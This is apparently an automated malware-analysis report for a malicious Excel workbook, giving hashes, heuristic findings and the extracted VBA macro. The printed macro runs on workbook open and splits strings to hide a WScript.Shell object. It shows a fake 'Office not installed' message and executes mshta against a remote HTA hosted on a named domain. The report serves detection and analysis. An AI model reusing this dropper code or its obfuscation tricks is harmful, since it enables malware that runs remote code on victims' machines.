Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f9f8626c4177ae22…

MALICIOUS

Office (OOXML)

13.6 KB Created: 2021-04-07 13:16:33 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-25
MD5: 4fe99bdbc23306052bf28cf130a654b9 SHA-1: 600b6d0c2888a6437c8b423c97e31d02519c9f01 SHA-256: f9f8626c4177ae2255a8ce087f38b08e57cd3f54061bfb484367130ec943462f
128 Risk Score

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1572 bytes
SHA-256: 61b1bde5a9e4c9457f0a13942fc3aa69e27b8d67a7b0c8843686f461179f13da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub asds()

End Sub

Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function
Function E() As String
E = "a"
End Function
Function L() As String
L = "p"
End Function
Function K() As String
K = "diamantesviagens.com.br/"
End Function
Function T() As String
T = "VirusEmHta.mp3"
End Function
Function F() As String
F = " H" + D + D + L + "://" + K + T
End Function
Function pings() As String
pings = X + Y + Z + D + E + F
End Function
Private Sub Workbook_Open()
Set meinkonhun = GetObject("" + "n" + "e" + "w" + ":" + "F93" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0-1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "00C04" + "FD" + "5" + "8" + "A" + "0" + "B")
: MsgBox "Microsoft Office not Installed"
: meinkonhun.EXEC pings
End Sub



Attribute VB_Name = "Planilha1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: dcf440a594d2e2e0b2fda2c3becbb327d6f8be242ff43ba8716f053a39415750

Open this report in the interactive analyzer, or submit your own file for analysis.